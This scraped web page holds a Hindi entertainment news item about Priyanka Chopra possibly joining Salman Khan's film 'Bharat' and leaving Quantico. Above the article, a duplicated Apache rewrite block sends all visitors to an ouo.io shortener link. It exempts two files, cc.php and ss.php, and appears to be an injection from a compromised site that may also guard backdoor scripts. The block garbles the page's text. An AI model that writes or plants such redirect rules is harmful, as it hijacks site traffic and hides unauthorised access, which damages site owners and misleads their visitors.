
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 340
मुंबई। बॉलीवुड के बाद हॉलीवुड में अपनी एकटिंग से परचम लहराने वाली प्रियंका को लेकर एक खबर आ रही है। माना जा रहा है कि काफी समय से बॉलीवुड फिल्मों में नहीं दिखने वाली प्रियंका फिर से बॉलीवुड फिल्म में नजर आ सकती है। खबर आ रही है कि प्रियंका दंबग खान के साथ फिल्म भारत में नजर आ सकती हैं। हालांकि इसके लिए उन्हें 'क्वांटिको' सीरियल को छोड़ना पड़ सकता है।
सूत्रों की मानें तो प्रियंका को 'भारत' फिल्म की कहानी पसंद आई है। वह फिल्म को लेकर काफी एक्साइटेड भी है। उन्होंने अभी तक प्रोजेक्ट साइन नहीं किया है। अगर प्रियंका इस फिल्म को साइन करती हैं तो वह 'क्वांटिको' के चौथे सीजन में नजर नहीं आएंगी। सूत्रों की मानें तो प्रियंका 'क्वांटिको' के चौथे सीजन को लेकर कुछ ज्यादा एक्साइटेड नहीं है। उनका मानना है कि सीरीज को आगे बढा़ने से फैंस का एक्साइटमेंट कम हो जाएगा। इसके साथ ही कहा जा रहा है कि वह इंटरनेशनल प्रोजेक्ट्स की बजाय अब हिंदी फिल्मों की ओर दोबारा रुख करना चाहती हैं। प्रियंका इन दिनों 'क्वांटिको' सीजन 3 की शूटिंग में बिजी है। सीरियल का प्रमोशन करने के बाद वह जल्द ही भारत लौट आएंगी। हालांकि 'क्वांटिको' के चौथे सीजन को लेकर आधिकारिक रूप से कोई भी बयान सामने नहीं आया है। आपको बता दें, 'भारत' का निर्देशन अली अब्बास जफर कर रहे हैं जो सलमान के साथ 'सुल्तान' और 'टाइगर जिंदा है' जैसी सुपरहिट फिल्में दे चुके हैं। वहीं प्रियंका इससे पहले सलमान के साथ 'मुझसे शादी करोगी', 'सलाम-ए-इश्क' और 'गॉड तुसी ग्रेट हो' जैसी फिल्मों में साथ काम कर चुके हैं।